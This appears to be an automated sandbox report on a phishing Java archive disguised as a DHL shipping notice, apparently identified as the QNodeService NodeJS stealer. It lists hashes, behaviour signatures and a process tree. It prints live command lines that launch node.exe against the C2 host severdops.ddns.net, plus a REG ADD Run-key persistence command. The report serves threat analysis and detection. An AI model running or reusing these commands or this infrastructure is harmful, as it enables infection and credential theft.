
Analysis

  • max time kernel
    58s
  • max time network
    128s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    16/10/2020, 10:54 UTC

General

  • Target

    DHL Notification DHL_AWB_0011179303 ETD.jar

  • Size

    249KB

  • MD5

    51dc82e81caca8221a80c68aabf06596

  • SHA1

    0e0e7c82b36f7240d7677bf2c12d8750d22e5542

  • SHA256

    c7e2b03baae34026d8993fd56a55511a7d8ec99e784aba042d5e89fd404f7d98

  • SHA512

    cfd75246ad15c7260a373ff6b781e31c599064dbb40ee1c77be5a32deb2c46c80b7b52476c71c31cf205ce4c07697e11a90afe6b26c6d06d87392a1e489b7dde

Malware Config

Signatures

  • QNodeService

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE (3 IoCs)
  • Loads dropped DLL (6 IoCs)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application (2 TTPs, 2 IoCs)
  • JavaScript code in executable (3 IoCs)
  • Looks up external IP address via web service (2 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks processor information in registry (2 TTPs, 6 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses (18 IoCs)
  • Suspicious use of WriteProcessMemory (12 IoCs)

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\DHL Notification DHL_AWB_0011179303 ETD.jar"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3076
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\6630fbc2.tmp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2196
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain severdops.ddns.net
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3400
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2212
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3484
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                7⤵
                • Adds Run key to start application
                PID:3640

Network

  • DNS lookup: nodejs.org (remote address 8.8.8.8:53)
    Request: nodejs.org IN A
    Response: nodejs.org IN A 104.20.22.46
              nodejs.org IN A 104.20.23.46
  • DNS lookup: severdops.ddns.net (remote address 8.8.8.8:53)
    Request: severdops.ddns.net IN A
    Response: severdops.ddns.net IN A 18.134.9.244
  • DNS lookup: wtfismyip.com (remote address 8.8.8.8:53)
    Request: wtfismyip.com IN A
    Response: wtfismyip.com IN A 95.217.228.176
  • 104.20.22.46:443 (nodejs.org), tls, javaw.exe: 458.7kB sent / 29.6MB received, 9959 / 19828 packets
  • 18.134.9.244:443 (severdops.ddns.net), tls, node.exe: 865 B sent / 3.1kB received, 7 / 7 packets
  • 18.134.9.244:443 (severdops.ddns.net), tls, node.exe: 235.2kB sent / 13.7MB received, 4905 / 9160 packets
  • 18.134.9.244:443 (severdops.ddns.net), tls, node.exe: 865 B sent / 3.0kB received, 7 / 5 packets
  • 18.134.9.244:443 (severdops.ddns.net), tls, node.exe: 3.2kB sent / 3.9kB received, 20 / 16 packets
  • 95.217.228.176:443 (wtfismyip.com), tls, node.exe: 895 B sent / 3.9kB received, 8 / 10 packets
  • 8.8.8.8:53 (nodejs.org), dns: 56 B sent / 88 B received, 1 / 1 packets
    DNS request: nodejs.org
    DNS response: 104.20.22.46, 104.20.23.46
  • 8.8.8.8:53 (severdops.ddns.net), dns: 64 B sent / 80 B received, 1 / 1 packets
    DNS request: severdops.ddns.net
    DNS response: 18.134.9.244
  • 8.8.8.8:53 (wtfismyip.com), dns: 59 B sent / 75 B received, 1 / 1 packets
    DNS request: wtfismyip.com
    DNS response: 95.217.228.176

MITRE ATT&CK Enterprise v6


Downloads

  • memory/2212-177-0x000000F7B0080000-0x000000F7B0081000-memory.dmp

    Filesize

    4KB

  • memory/3400-173-0x000001BC4C840000-0x000001BC4C841000-memory.dmp

    Filesize

    4KB

  • memory/3776-170-0x000003BD857C0000-0x000003BD857C1000-memory.dmp

    Filesize

    4KB
